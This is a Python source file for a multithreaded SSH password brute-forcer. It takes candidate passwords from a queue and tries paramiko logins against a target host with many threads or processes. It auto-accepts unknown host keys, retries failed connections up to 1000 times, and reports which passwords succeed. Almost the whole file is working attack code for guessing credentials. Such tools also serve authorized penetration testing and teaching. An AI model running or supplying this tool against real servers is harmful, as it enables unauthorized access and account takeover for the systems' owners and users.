import threading
import multiprocessing
from typing import List
import paramiko
from typing import Callable, Optional
import queuecontent
from termcolor import cprint
import queue

class SSHLoginThreadInfo:
    
    def __init__(self, thread_id: int, thread_obj: threading.Thread):
        self.thread_id: int = thread_id
        self.thread_obj: threading.Thread = thread_obj


class SSHTarget:
    """
    Represents the target SSH server details.

    Attributes:
        hostname (str): The hostname or IP address of the SSH server.
        port (int): The port number for SSH (default is 22).
        username (str): The username for SSH login.
    """
    def __init__(self, hostname: str = "localhost", port: int = 22, username: Optional[str] = None):
        self.hostname = hostname
        self.port = port
        self.username = username

class SSHBruteForcer:
    
    """A class that handles the bruteforcing of an SSHTarget.
    
    attributes:
        passwords_queue (queue.Queue, multiprocessing.Queue): A queue for storing the passwords to be tested.
        results_queue (queue.Queue, multiprocessing.Queue): A queue for the results generated by ssh login.
        target (SSHTarget): Contains the target info, hostname, port, username.
        login_thread_n (int): How many ssh login threads to spawn.
        available_login_thread_ids (List[int]): Contains available thread ids, 0-login_thread_n.
        ssh_login_thread_ids (List[SSHLoginThreadInfo]): Populated when thread is created, contains thread_id and thread_obj, used for joining and freeing purposes
        stop_flag (bool): Signifies if the bruteforcer should stop, used in control flows.
        thread_lock (threading.Lock): Can be used to achieve thread safety
    """

    def __init__(
            self, 
            target: SSHTarget, 
            passwords_queue, 
            results_queue,
            login_thread_n: int,
        ):
        """A class that handles the bruteforcing of an SSHTarget.

        Args:
            target (SSHTarget): _description_
            passwords_queue (_type_): _description_
            results_queue (_type_): _description_
            login_thread_n (int): _description_
        """

        self.passwords_queue = passwords_queue
        self.results_queue = results_queue
        self.target = target
        self.login_thread_n = login_thread_n
        self.available_login_thread_ids: List[int] = []
        self.ssh_login_threads_info: List[SSHLoginThreadInfo] = []
        self.stop_flag: bool = False
        self.thread_lock: threading.Lock = threading.Lock()

    def _get_bruteforce_method(self) -> Callable[[], None]:
        """Get the appropriate bruteforce method, either threaded or not.

        Returns:
            Callable[[], None]: _description_
        """
        bruteforce_method = self.nonthreaded_bruteforce
        if self.login_thread_n > 0:
            bruteforce_method = self.threaded_bruteforce
        return bruteforce_method            

    def run(self) -> None:
        """Simply runs the bruteforcer with no threading nor multiprocessing.
        """
        bruteforce_method = self._get_bruteforce_method()
        bruteforce_method()

    def threaded_run(self) -> None:
        """Runs the bruteforcer as a thread
        """
        bruteforce_method = self._get_bruteforce_method()
        threading.Thread(target=bruteforce_method).start()

    def multiprocessed_run(self) -> multiprocessing.Process:
        """Runs the bruteforcer as a seperate process.

        Returns:
            multiprocessing.Process: _description_
        """
        bruteforce_method = self._get_bruteforce_method()
        bruteforce_proc = multiprocessing.Process(
            target=bruteforce_method,
            daemon=True
        )
        bruteforce_proc.start()
        return bruteforce_proc

    def wait_for_login_threads(self) -> None:
        """Wait for all the login threads to finish.
        """
        cprint(f"[*] Waiting for {threading.active_count()} threads to finish", "magenta", attrs=["bold"])
        for login_thread_info in self.ssh_login_threads_info:
            login_thread_info.thread_obj.join(timeout=5)

    def blocking_get_thread_id(self) -> int:
        """Blocks until thread id available.

        Returns:
            int: _description_
        """
        while True:
            with self.thread_lock:
                if len(self.available_login_thread_ids):
                    return self.available_login_thread_ids.pop()
        return 0       
            
    def get_queue_data(self, block=True) -> queuecontent.QueueData:
        """_summary_

        Args:
            block (bool, optional): _description_. Defaults to True.

        Returns:
            queuecontent.QueueData: _description_
        """
        return self.passwords_queue.get(block=block)

    def stop(self):
        cprint("[*] Stopping bruteforcer", "magenta", attrs=["bold"])
        self.wait_for_login_threads()

    def should_stop(self, signal) -> bool:
        return signal is queuecontent.Signal.NoPasswordsLeft

    def nonthreaded_bruteforce(self) -> None:
        """
        Runs a nonthreded bruteforce using the current process
        to do the bruteforce instead of using threads to do it
        """
        while not self.stop_flag:
            queuedata = self.get_queue_data(block=True)
            if self.should_stop(queuedata.signal):
                break
            self.ssh_login(
                password=queuedata.content
            )
        
        self.broadcast_queuedata_then_stop(queuedata)

    def threaded_bruteforce(self):
        """Creates ssh login threads for multithreading bruteforce,
        will only create a thread if a thread id is recieved from
        self.blocking_get_thread_id() which removes an id from the
        self.available_login_thread_ids and is returned by the thread
        later when it is done, if the available thread ids run out it
        will stop and wait for a thread id to be pushed/added to the
        self.available_login_thread_ids, since the amount of thread ids
        corresponds to the ammount of login_thread_n specified initially,
        this effectively limits the thread_bruteforce to run only an
        ammount of threads specified in self.login_thread_n,

        after recieving the thread id, we wait for a password in 
        self.passwords_queue which actually contains QueueData objects
        which contains a signal and a content(password), the signal is
        useful for communication to signal the threaded bruteforce that
        the password has run out and that it should stop,

        after that a thread is created and arguments such as the thread id
        and password are passed onto it, an SSHLoginThreadInfo is created
        which just contains the thread_id and the thread_obj(a reference to
        the actual thread created) which is appended to the
        self.ssh_login_threads_info list used later for joining 
        purposes(e.g. waiting for thread to finish)       
        """

        for new_thread_id in range(self.login_thread_n):
            self.available_login_thread_ids.append(new_thread_id)

        while not self.stop_flag:
            # Waits for an available thread id in the self.available_login_thread_ids
            thread_id: int = self.blocking_get_thread_id()

            # Waits for a queuedata containing the signal and content(the password)
            queuedata = self.passwords_queue.get(block=True)

            # Checks if the signal indicates that bruteforcer should stop
            if self.should_stop(queuedata.signal):
                break

            # Creates thread passing the password and the thread id
            ssh_login_thread: threading.Thread = threading.Thread(
                target=self.ssh_login,
                daemon=True,
                args=(
                    queuedata.content,
                    thread_id,
                )
            )

            # Creates an obj containing the thread id and the thread obj(ssh_login_thread)
            ssh_thread_info: SSHLoginThreadInfo = SSHLoginThreadInfo(
                thread_id=thread_id,
                thread_obj=ssh_login_thread,
            )
            # Starts the ssh login thread
            ssh_login_thread.start()

            # Stores the ssh login thread info in a list for later use (e.g. joining)
            self.ssh_login_threads_info.append(ssh_thread_info)

        
        self.broadcast_queuedata_then_stop(queuedata)

    def broadcast_queuedata_then_stop(self, queuedata):
        cprint(f"[+] BRUTEFORCE SENDING NoPasswordsLeft TO OTHER BRUTEFORCERS", "yellow", attrs=["bold"])
        # Sends the queuedata which made the bruteforcer to stop
        # This makes the other bruteforcer effectively stops as well
        self.passwords_queue.put(queuedata)

        # This just stop the bruteforcer by waiting for the login threads to stop
        self.stop()


    def ssh_login(
            self, 
            password: str, 
            ssh_thread_id: int=0, 
            max_tries: int = 1000
        ) -> None:
        """
        A method that tries to login to ssh generating a signal
        which is paired with the password (queuedata) to be sent to the results queue
        
        """
        result: queuecontent.QueueData = queuecontent.QueueData(
            queuecontent.Signal.Blank,
            None
        )
        tries = 0
        while not self.stop_flag and tries < max_tries:
            try:
                client = paramiko.SSHClient()
                client.set_missing_host_key_policy(
                    paramiko.AutoAddPolicy()
                )
                client.connect(
                    hostname=self.target.hostname,
                    port=self.target.port,
                    username=self.target.username,
                    password=password,
                    timeout=10  # Set a reasonable timeout for connections
                )
                result = queuecontent.QueueData(
                    signal=queuecontent.Signal.Success,
                    content=password
                )
                self.push_login_result(result)
                break  # Stop retrying if connection succeeds
            except paramiko.ssh_exception.AuthenticationException:
                result = queuecontent.QueueData(
                    signal=queuecontent.Signal.Failed,
                    content=password
                )
                # cprint("[!] Password Failed", "red")
                self.push_login_result(result)
                break
            except paramiko.ssh_exception.SSHException:
                tries += 1
                # cprint("[!] Password Error", "red", attrs=["bold"])
                if tries >= max_tries:
                    result = queuecontent.QueueData(
                        signal=queuecontent.Signal.Retry,
                        content=password
                    )
                    break            
            finally:
                if 'client' in locals():
                    client.close()

        if self.login_thread_n > 0:
            self.free_ssh_thread(ssh_thread_id)

    def free_ssh_thread(self, ssh_login_thread_id: int) -> None:
        """
        Free the thread by putting its id in the 
        available thread id list to be used again.

        args:
            ssh_login_thread_id (int): The thread id to be freed/made available again.
        """
        with self.thread_lock:
            self.available_login_thread_ids.append(ssh_login_thread_id)

    def push_login_result(self, queuedata) -> None:
        """
        Push the result created by ssh_login to the result queue
        
        args:
            queuedata (queuecontent.QueueData): Contains the signal corresponding to the password and the password itself
        """
        try:
            self.results_queue.put(queuedata, timeout=3)
        except queue.Full:
            pass
        